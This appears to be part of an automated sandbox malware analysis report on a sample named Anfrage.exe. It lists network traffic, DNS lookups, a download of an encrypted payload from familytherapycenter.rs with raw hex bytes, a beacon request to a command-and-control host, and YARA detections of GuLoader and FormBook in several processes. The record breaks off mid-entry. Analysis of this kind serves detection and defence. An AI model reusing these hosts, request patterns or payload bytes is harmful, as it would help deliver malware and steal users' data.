                                                                        Nov 11, 2024 12:04:37.970590115 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.970710039 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.970783949 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.970804930 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.970879078 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.971492052 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.971570015 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.972134113 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.972203970 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.972230911 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.972296953 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.972711086 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.972800016 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:38.006541967 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:38.006699085 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:38.047262907 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:38.047369003 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:38.047439098 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:38.047522068 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:38.047559023 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:38.047665119 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:38.047915936 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:38.047993898 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:38.048037052 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:38.048101902 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:38.048113108 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:38.048162937 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:38.048214912 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:38.048264980 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:38.059905052 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:38.059925079 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:38.059997082 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:38.060030937 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:05:16.426477909 CET4971680192.168.2.83.33.130.190
                                                                        Nov 11, 2024 12:05:16.431441069 CET80497163.33.130.190192.168.2.8
                                                                        Nov 11, 2024 12:05:16.431562901 CET4971680192.168.2.83.33.130.190
                                                                        Nov 11, 2024 12:05:16.439150095 CET4971680192.168.2.83.33.130.190
                                                                        Nov 11, 2024 12:05:16.444019079 CET80497163.33.130.190192.168.2.8
                                                                        Nov 11, 2024 12:05:16.863430023 CET80497163.33.130.190192.168.2.8
                                                                        Nov 11, 2024 12:05:16.864773989 CET80497163.33.130.190192.168.2.8
                                                                        Nov 11, 2024 12:05:16.864866972 CET4971680192.168.2.83.33.130.190
                                                                        Nov 11, 2024 12:05:16.866852999 CET4971680192.168.2.83.33.130.190
                                                                        Nov 11, 2024 12:05:16.871660948 CET80497163.33.130.190192.168.2.8

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 11, 2024 12:04:36.647671938 CET5035553192.168.2.81.1.1.1
                                                                        Nov 11, 2024 12:04:36.851331949 CET53503551.1.1.1192.168.2.8
                                                                        Nov 11, 2024 12:05:16.405495882 CET5359953192.168.2.81.1.1.1
                                                                        Nov 11, 2024 12:05:16.418987036 CET53535991.1.1.1192.168.2.8

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Nov 11, 2024 12:04:36.647671938 CET192.168.2.81.1.1.10x7caStandard query (0)familytherapycenter.rsA (IP address)IN (0x0001)false
                                                                        Nov 11, 2024 12:05:16.405495882 CET192.168.2.81.1.1.10x2c6cStandard query (0)www.7fh27o.vipA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Nov 11, 2024 12:04:36.851331949 CET1.1.1.1192.168.2.80x7caNo error (0)familytherapycenter.rs188.40.95.144A (IP address)IN (0x0001)false
                                                                        Nov 11, 2024 12:05:16.418987036 CET1.1.1.1192.168.2.80x2c6cNo error (0)www.7fh27o.vip7fh27o.vipCNAME (Canonical name)IN (0x0001)false
                                                                        Nov 11, 2024 12:05:16.418987036 CET1.1.1.1192.168.2.80x2c6cNo error (0)7fh27o.vip3.33.130.190A (IP address)IN (0x0001)false
                                                                        Nov 11, 2024 12:05:16.418987036 CET1.1.1.1192.168.2.80x2c6cNo error (0)7fh27o.vip15.197.148.33A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • familytherapycenter.rs
                                                                        • www.7fh27o.vip

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.8497163.33.130.190802220C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 11, 2024 12:05:16.439150095 CET550OUTGET /wevl/?adSdg=uTwLyznpTHNh&LHxDf=lbf7j9XjlAZpd6A3UpNyt3NI6+34CVhmT1tEP0o3aWJOYRwplTIV2PpchU+8eNrfAMA1Qr8MjrKSknsxLVAK3zAHSnA/F7MUkgRRnoRlRVKgbnrUxpjP+0evIyvFm5JEhA== HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.7fh27o.vip
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; LGL39C Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                        Nov 11, 2024 12:05:16.863430023 CET412INHTTP/1.1 200 OK
                                                                        Server: openresty
                                                                        Date: Mon, 11 Nov 2024 11:05:16 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 272
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 61 64 53 64 67 3d 75 54 77 4c 79 7a 6e 70 54 48 4e 68 26 4c 48 78 44 66 3d 6c 62 66 37 6a 39 58 6a 6c 41 5a 70 64 36 41 33 55 70 4e 79 74 33 4e 49 36 2b 33 34 43 56 68 6d 54 31 74 45 50 30 6f 33 61 57 4a 4f 59 52 77 70 6c 54 49 56 32 50 70 63 68 55 2b 38 65 4e 72 66 41 4d 41 31 51 72 38 4d 6a 72 4b 53 6b 6e 73 78 4c 56 41 4b 33 7a 41 48 53 6e 41 2f 46 37 4d 55 6b 67 52 52 6e 6f 52 6c 52 56 4b 67 62 6e 72 55 78 70 6a 50 2b 30 65 76 49 79 76 46 6d 35 4a 45 68 41 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?adSdg=uTwLyznpTHNh&LHxDf=lbf7j9XjlAZpd6A3UpNyt3NI6+34CVhmT1tEP0o3aWJOYRwplTIV2PpchU+8eNrfAMA1Qr8MjrKSknsxLVAK3zAHSnA/F7MUkgRRnoRlRVKgbnrUxpjP+0evIyvFm5JEhA=="}</script></head></html>


                                                                        HTTPS Proxied Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.849713188.40.95.1444438048C:\Users\user\Desktop\Anfrage.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-11 11:04:37 UTC194OUTGET /JWXOdIrgRlshLWuPJxOk219.bin HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                        Host: familytherapycenter.rs
                                                                        Cache-Control: no-cache
                                                                        2024-11-11 11:04:37 UTC320INHTTP/1.1 200 OK
                                                                        Date: Mon, 11 Nov 2024 11:04:37 GMT
                                                                        Server: Apache
                                                                        Upgrade: h2,h2c
                                                                        Connection: Upgrade, close
                                                                        Last-Modified: Wed, 06 Nov 2024 13:59:50 GMT
                                                                        Accept-Ranges: bytes
                                                                        Content-Length: 289344
                                                                        Cache-Control: max-age=172800
                                                                        Expires: Wed, 13 Nov 2024 11:04:37 GMT
                                                                        Content-Type: application/octet-stream
                                                                        2024-11-11 11:04:37 UTC7872INData Raw: 1f 39 62 92 ed cf 66 3c be f2 a1 1f a8 80 13 9d cf 32 19 43 30 77 c0 e6 a8 c1 ea 02 e0 73 1d 22 14 f2 49 cd 7f 21 d3 2a cd 93 3a c6 6f 01 9b 1d 49 2d a8 49 39 45 b1 1e 9f e3 64 5d 53 da b7 e5 e2 08 c8 fe dc 13 5d 9b 6d 3a 37 c8 1d b8 8b 81 86 6e 94 89 35 29 e9 c0 2f ad 6c 0a e8 38 25 1c 88 3f 96 fe 92 71 94 24 a6 bc 20 c2 67 62 86 5d 43 75 24 0d f8 50 41 ef 19 3b df 86 eb a3 a8 1c c1 e0 10 2f 44 65 ce 82 83 dc 2e cd b9 2a 4b 53 86 6a c4 b4 44 3b 3c 6b a2 10 f4 93 c6 1a ec 0f 50 ea ae 7d e0 e2 b9 d4 56 30 5a 76 7a f3 fc e5 dd 9a 3c 56 76 9f 04 91 73 59 cd e8 70 71 0b 28 1a 50 03 0f dd bd 1a fa 17 13 4d 11 1b 5e b5 93 c7 e2 74 75 fe 17 8e 07 87 c4 32 69 ee 6f f3 53 40 1b eb c7 53 16 56 c4 f8 f8 34 23 9d 68 7f e8 68 70 f6 ca 95 e2 97 f6 b8 fc 1a 74 63 11 49
                                                                        Data Ascii: 9bf<2C0ws"I!*:oI-I9Ed]S]m:7n5)/l8%?q$ gb]Cu$PA;/De.*KSjD;<kP}V0Zvz<VvsYpq(PM^tu2ioS@SV4#hhptcI
                                                                        2024-11-11 11:04:37 UTC8000INData Raw: 2f 5f 54 35 5a 9d 08 64 7c b7 18 96 56 94 3a 68 c9 2c b8 53 4e eb c8 c9 d7 42 47 87 53 1a a0 7d 86 f2 38 56 1d f1 16 9b 86 77 61 8e 9c 1f 7c 10 11 0e f1 5c 92 7b a5 fd 4c 94 40 b0 18 3f 3d ba 81 04 7c 92 0e 4a e9 ad a4 c5 ae 4b 48 32 a9 57 10 c0 d8 40 d2 64 5b 82 5b ad e4 10 14 ba 34 8b 01 b2 59 a6 da 8c c7 37 d2 59 c1 36 1f 37 28 7b e2 40 d7 6f 99 1a 6c 57 d1 4f ff 2d 21 f1 ef d0 28 0f 54 cb 88 38 aa 27 2f aa 0d 59 3f cf 53 7d e3 4e c2 c1 98 d0 3b 68 bd c5 67 c5 60 13 66 93 ad 5d 57 75 64 9a af 6b 8a a0 b2 a4 af d6 96 27 ea c4 03 94 de d6 eb 72 5c f2 51 f8 36 cd 84 bc 9d bb 0e a5 a0 e3 ae 67 25 3f 96 66 c2 e0 36 ec 83 a1 dc 1b 2e d6 fb 55 42 09 fd 1c d2 62 71 fa 73 6e 8d 0b 8c f4 a0 61 f5 cd f0 a6 88 90 a8 18 ea 46 df ae c9 77 a2 d4 d1 62 0c e4 59 22 b2
                                                                        Data Ascii: /_T5Zd|V:h,SNBGS}8Vwa|\{L@?=|JKH2W@d[[4Y7Y67({@olWO-!(T8'/Y?S}N;hg`f]Wudk'r\Q6g%?f6.UBbqsnaFwbY"
                                                                        2024-11-11 11:04:37 UTC8000INData Raw: 13 c0 c3 5f 76 26 72 ce 20 1a be 96 b7 19 5f 51 40 fe ad 2b 80 43 ba d2 a8 cd 8f ab 49 5f 22 50 30 30 26 30 83 aa 69 b8 52 f2 d1 d7 bc 4a 61 df 69 a9 e2 da ff 64 79 f1 20 05 6b 27 4c 15 a4 de 77 2d e2 2f fd 11 ed b9 5d 7c 7a 0d 65 7d 9a 7d 61 09 8a ee c3 56 f9 3e 9a ab f3 ad 90 fc 84 a4 aa 37 fb 2d 30 ea f5 1a 00 03 1c 88 58 3c f3 53 f3 bc 3f 77 c4 92 51 a5 5b d9 f6 a1 50 2b c2 62 fb 39 3d 61 e6 e5 25 ef d0 b4 58 72 03 13 23 e4 b1 5a 64 4c 15 c4 73 16 3d 46 54 75 79 13 a8 bf 7d c6 29 c3 e8 4b c2 8d 07 62 95 36 8c 72 7b 5f 94 7f 6e 27 b2 bb b0 ba 5b fd ef 37 6a 40 19 fd 47 3b de a3 b2 f8 fd 0a 67 74 6f 42 e2 e0 0c c6 2b 52 0a c3 8a 1a a2 38 48 a8 9b a6 2c 87 8c 43 bc d4 f8 9a 27 6e 72 e7 76 d3 2c 77 b0 a4 46 0d e6 96 67 b8 48 63 19 07 a6 2c ed ca 5e 8b f4
                                                                        Data Ascii: _v&r _Q@+CI_"P00&0iRJaidy k'Lw-/]|ze}}aV>7-0X<S?wQ[P+b9=a%Xr#ZdLs=FTuy})Kb6r{_n'[7j@G;gtoB+R8H,C'nrv,wFgHc,^
                                                                        2024-11-11 11:04:37 UTC8000INData Raw: 68 d1 54 58 6b 1e 75 1b 3a 6d 45 fc bc a6 5b d2 9c c4 c8 50 89 46 c2 42 c5 a9 dd 8b ec 18 6c c6 4a 72 a6 7f 99 a8 d6 5d d5 98 21 ea d4 0d 02 ad dc 12 b9 4d 9f e0 1b b7 3c ad a0 f1 5f c2 e5 40 00 b8 fd e0 79 6d 80 c6 ee 7a cc 69 fd 00 a9 33 87 ce bb 94 55 66 d2 f4 ba 86 fa 6e ba ba f4 62 43 7a 38 92 08 06 d4 db d7 64 e1 25 8c 2f ec 2a 38 1a 2d 98 2a de e6 6e b1 ed f3 55 06 9d e0 e7 51 bc 8f f8 5e 08 ec f9 33 8a 64 ce 34 4d 4d 9b 84 3f f9 28 14 7d 93 41 4a aa df c0 ad 5e 67 0a b7 b2 78 b8 2b c0 60 82 ef 55 69 df 72 7c 85 56 1e f6 b9 4d 1c b8 94 13 d2 1a df d1 37 5d c1 c2 61 56 79 47 31 90 84 c0 16 eb 50 2c a6 fe ba 5a f3 36 be 55 73 d7 ef 32 72 9f 37 4a 85 a3 e3 b0 6b 5a 08 07 31 eb 70 07 f5 f1 7a 89 8b 30 33 cf 77 fa 9f e3 e7 ab 40 56 11 a3 bf 77 ab 20 34
                                                                        Data Ascii: hTXku:mE[PFBlJr]!M<_@ymzi3UfnbCz8d%/*8-*nUQ^3d4MM?(}AJ^gx+`Uir|VM7]aVyG1P,Z6Us2r7JkZ1pz03w@Vw 4
                                                                        2024-11-11 11:04:37 UTC8000INData Raw: 1e 56 20 06 7d 17 fc 00 70 54 2d 70 1d 8d c5 95 1f a1 49 f6 60 60 80 10 14 2b e9 20 85 2c 2a 81 19 4d e3 23 d8 41 b1 9a 65 d2 26 2c fb eb 8e 5b c3 b8 c0 c5 73 5e 25 0b dc 2d aa be 10 1c 93 ab 50 ef 47 8c 9a 78 07 ba 1d 59 e3 e3 e2 cc 42 39 f7 b0 5c 16 9a c6 08 f7 93 ba 86 94 a8 9b 7c b7 b3 76 6f c4 e5 d8 6e ac 63 4c 22 b9 76 30 76 e8 cb fc 02 07 19 69 0e 1c 0d 08 4b 7d 09 61 b8 4b 93 9c 53 9a 46 3a bb 8b e4 90 fa 75 4c 56 aa d4 3a 56 24 2a 41 3f 0c 62 45 6c 95 cb 0c c5 44 25 9b 08 9f b0 3f db 70 50 aa 0c 3e 0a 37 5a 0d f0 fa de a1 61 3c bd 76 9c 7a 42 b9 e7 8e 03 d9 b7 2e b9 76 c1 86 7c c1 e1 1d 8e 91 39 09 64 10 18 30 8f 02 84 92 07 95 77 ae d0 5c 2f cc eb 8b c6 7c f3 f3 8a bd de 92 28 9d f9 60 75 37 de cb 70 55 34 54 00 5d 27 fc b9 00 51 34 12 92 b7 5b
                                                                        Data Ascii: V }pT-pI``+ ,*M#Ae&,[s^%-PGxYB9\|voncL"v0viK}aKSF:uLV:V$*A?bElD%?pP>7Za<vzB.v|9d0w\/|(`u7pU4T]'Q4[
                                                                        2024-11-11 11:04:37 UTC8000INData Raw: a5 7a 85 49 16 97 cd b3 dd fb 75 39 98 18 3e 4f 3a c8 99 13 54 3b 92 11 61 10 37 ad 3d e1 34 50 1e c1 72 9f 17 ec 5c d4 83 fb dd 13 9c 06 d8 00 1b d3 0a 2c bf e8 eb 24 b3 f8 79 d5 37 fd a1 ba ae 78 9e 11 fc b3 d3 d1 ae 86 d8 48 b8 b7 0c c7 ed c2 1b 4c 48 66 d4 87 cd 35 21 fd d1 98 32 fc 1f 4b 18 e3 38 1a aa 6e 28 27 fa 5e a4 d3 26 6a e9 0d 46 36 91 8f 4a a6 51 10 64 1b d6 a1 89 43 1b c6 50 06 ef 71 ab 29 25 0c 5a d1 ee 63 84 c8 6f 76 c1 2c c7 62 ec ba 2d da d7 56 42 a2 69 b9 cb 30 45 dc 79 3f c1 e1 b4 ae 36 4e 3d 5a b6 dc 97 27 e6 4e 4e 1c d3 6c 40 cd ab d7 72 df 6d 3a 53 6e 7c 2e e8 cc c4 6a 0d 11 f9 f9 2a 76 d0 bf 61 b6 99 84 54 7b 61 a4 33 41 4c 88 55 e3 e1 6c 1d 03 df 86 cd f0 8a fe 93 b9 10 7f 2e 34 d8 90 97 95 1e 6f 86 20 df 65 4e 64 88 8f 35 3d 68
                                                                        Data Ascii: zIu9>O:T;a7=4Pr\,$y7xHLHf5!2K8n('^&jF6JQdCPq)%Zcov,b-VBi0Ey?6N=Z'NNl@rm:Sn|.j*vaT{a3ALUl.4o eNd5=h
                                                                        2024-11-11 11:04:37 UTC8000INData Raw: fd 30 f6 34 f3 e2 9a 3a fe 2c 8a 1f da 50 c5 2e 0f cb 1c ac d0 c7 c7 b9 21 76 ae d7 07 13 ca 6c 84 8c 2e 89 5a 5b 7a 53 d5 2c 1e 56 30 d8 f4 21 80 be 5f 54 57 8e 01 ed b0 12 bf dc bf 90 e5 17 3c c4 23 9c 97 fe 79 94 15 4e 51 45 e2 29 89 19 49 49 dc 47 02 64 a6 d4 0f 0e f2 5f b4 1b 1e e6 d4 03 4a 78 71 57 cb b5 58 30 de 33 51 64 82 59 63 1c b7 1c 97 d7 6e 19 2d 5b 14 47 d3 0b a3 bc 60 d8 e7 54 22 a8 80 d3 02 00 a7 cc 71 4d fe 70 92 29 95 ad e8 f7 ca c5 70 0a 03 c0 01 a7 78 85 df 3a fd f9 d1 9f 49 86 2f 8c ab 59 05 e3 7b e8 22 cc ad 1f 82 37 59 a6 8c 7c 69 a5 9b dc 9d cf a7 9b ae 92 62 b5 aa e4 2a 29 c9 e4 ac 9b 31 68 3d 97 bf b9 32 20 d4 b4 04 66 f2 2c c6 4b b0 c2 42 e5 49 7a 10 10 5a 1a 76 3b 97 d1 c5 ec 84 df 51 da d2 ec ee b9 1b 8e ab cc d7 d6 2f bf a4
                                                                        Data Ascii: 04:,P.!vl.Z[zS,V0!_TW<#yNQE)IIGd_JxqWX03QdYcn-[G`T"qMp)px:I/Y{"7Y|ib*)1h=2 f,KBIzZv;Q/
                                                                        2024-11-11 11:04:37 UTC8000INData Raw: a7 c8 07 85 ab 25 f3 07 50 bb 3b ac 63 c1 d9 84 e0 6b b0 a0 b1 8c a0 86 7f a3 01 4e cf 5f 98 12 4e d0 4c 99 76 a6 81 1e 80 ab 19 7b 1b 01 2a 42 28 d0 43 3b ca c4 f5 56 ee ce 1a cf 53 21 b4 e3 98 c0 d9 ec 36 77 35 a5 a0 dc 2a ea 72 96 06 6a b2 eb 4d 98 11 1f 8a 12 8f c8 d5 a7 d3 87 bd f4 97 33 30 1c e9 db 16 a6 5e 7d fd 04 97 83 7a 9c 8b 2c 53 b8 aa b0 bb 6f 17 2b 98 64 12 92 b8 6c e2 30 98 b0 ec e8 b4 b8 7c 3a 63 ed c2 1d 23 fa ff 00 cf 3f d2 8d e2 5f 5e 60 75 30 f7 af d0 bc 7d 64 40 71 bc 68 a6 dc 10 38 13 b6 22 2b b4 d5 20 9b 37 3f 27 ac 5c f3 47 69 00 a9 15 c4 4b 0c c0 c5 2a 94 b9 d7 5b df 6d 85 e0 76 1b fa 8e bd 16 b3 ef 59 6e d3 3e de 35 76 64 b3 2e 58 15 10 50 ee 7f 47 14 b4 6d 5e df 3c 8a 9a 55 87 1d a0 86 4e 0b 41 f9 04 4e 1d f4 ec b0 e6 c5 dd 8e
                                                                        Data Ascii: %P;ckN_NLv{*B(C;VS!6w5*rjM30^}z,So+dl0|:c#?_^`u0}d@qh8"+ 7?'\GiK*[mvYn>5vd.XPGm^<UNAN
                                                                        2024-11-11 11:04:37 UTC8000INData Raw: cf b4 f0 59 83 7a d2 b6 5f 5e 20 85 66 55 20 c2 1f 32 b2 72 2a 0c 25 7c 1b fb f0 d7 fd 68 35 d7 74 66 5d 78 2c 42 ab 49 77 94 b2 dd 99 4b 1e 4e 11 bb 0d 96 c2 e3 c1 1a 44 86 31 e1 d5 23 da 93 af 8e 6c b2 7b 37 10 35 27 59 c7 f4 bb 37 72 58 fb 03 d9 6d a5 ff 0f b8 dd 25 12 51 79 65 55 50 16 1d d2 7b d1 97 9e 5f 0d c0 dd 03 46 04 26 26 a7 7d 8e cb 86 20 f2 4a bb c8 8c f0 88 1a 02 45 74 fe c0 c7 03 aa 35 b0 ed 62 83 e9 82 eb c6 61 47 e7 a4 c7 b9 a5 3f 05 b0 d5 43 d6 36 6a 9a b9 6d 46 91 58 e7 61 b9 9f 47 f8 7d 95 ed 40 51 85 5a 6a 5f 76 50 cc bd 6b 89 4c ee 61 be 3f ef e4 dd ac 5c 5f ea 75 fc 11 fc c5 49 a9 38 eb 59 77 05 c7 61 98 c1 81 dd 51 85 20 9b 8d 6f bd 9b 6a 07 31 a8 bb c3 52 11 65 82 c6 e8 13 4b ae cb 8c 37 dd cf cc d2 b7 22 3c 26 46 9d 51 66 97 a7
                                                                        Data Ascii: Yz_^ fU 2r*%|h5tf]x,BIwKND1#l{75'Y7rXm%QyeUP{_F&&} JEt5baG?C6jmFXaG}@QZj_vPkLa?\_uI8YwaQ oj1ReK7"<&FQf
                                                                        2024-11-11 11:04:37 UTC8000INData Raw: 81 fb 0b 5e 98 7a c7 bf 51 36 68 c3 aa 33 5e 49 a0 92 ee 0c a6 fc 97 0c a1 0f 94 c6 cf 0b c9 62 33 1c bd 74 da 0c a0 b2 31 fe 3a ed 2d fe f8 ac 1d 2b 4d b6 ef f2 66 c1 96 2e 53 82 bd cf 9d f0 b6 48 e8 23 a2 16 df 57 ae b5 fc 4b 5f eb 67 a7 46 b0 e6 32 00 56 e4 76 a9 39 24 f2 d2 e4 e9 d3 e3 47 63 37 2d ed 4f e9 2f 60 9e 9e 83 1e ff 0c 7c d4 9b c7 72 79 52 a1 d9 75 e6 b4 7e c4 bb 18 68 32 f8 4f 35 30 97 21 62 71 f0 e9 ad a2 5d 1b 4d 2c 9e 79 17 be e7 2e b8 c0 4a fe 42 be 11 60 68 c1 9e d7 13 cf 8e 23 71 4f d3 d0 80 6f 22 f5 2f e0 cc 73 30 14 11 fb cf a7 ef 8f c9 0b 51 c7 bb 2a 46 03 ce 59 59 50 a9 e5 2b 20 ac 5c 3d a3 3f 0a 69 a6 6e ba f8 45 d3 84 b3 6c 33 d5 1c 41 4a 3a 3d 91 59 a0 31 d2 c1 74 86 9a f7 c3 e0 af 36 54 a2 94 00 05 58 49 40 55 ae 18 76 00 cc
                                                                        Data Ascii: ^zQ6h3^Ib3t1:-+Mf.SH#WK_gF2Vv9$Gc7-O/`|ryRu~h2O50!bq]M,y.JB`h#qOo"/s0Q*FYYP+ \=?inEl3AJ:=Y1t6TXI@Uv


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:06:03:15
                                                                        Start date:11/11/2024
                                                                        Path:C:\Users\user\Desktop\Anfrage.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\Anfrage.exe"
                                                                        Imagebase:0x400000
                                                                        File size:1'251'520 bytes
                                                                        MD5 hash:71EA800A6B7644BE75507E3B74E3CCE2
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2122397614.00000000034FA000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:7
                                                                        Start time:06:04:27
                                                                        Start date:11/11/2024
                                                                        Path:C:\Users\user\Desktop\Anfrage.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\Anfrage.exe"
                                                                        Imagebase:0x400000
                                                                        File size:1'251'520 bytes
                                                                        MD5 hash:71EA800A6B7644BE75507E3B74E3CCE2
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2511601246.00000000370E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2476059980.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.2476095227.00000000020FA000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:8
                                                                        Start time:06:04:55
                                                                        Start date:11/11/2024
                                                                        Path:C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe"
                                                                        Imagebase:0xed0000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:9
                                                                        Start time:06:04:56
                                                                        Start date:11/11/2024
                                                                        Path:C:\Windows\SysWOW64\ktmutil.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\SysWOW64\ktmutil.exe"
                                                                        Imagebase:0x880000
                                                                        File size:15'360 bytes
                                                                        MD5 hash:AC387D5962B2FE2BF4D518DD57BA7230
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2646659218.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2646605622.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:moderate
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:11
                                                                        Start time:06:05:09
                                                                        Start date:11/11/2024
                                                                        Path:C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe
                                                                        Wow64 process (32bit):true
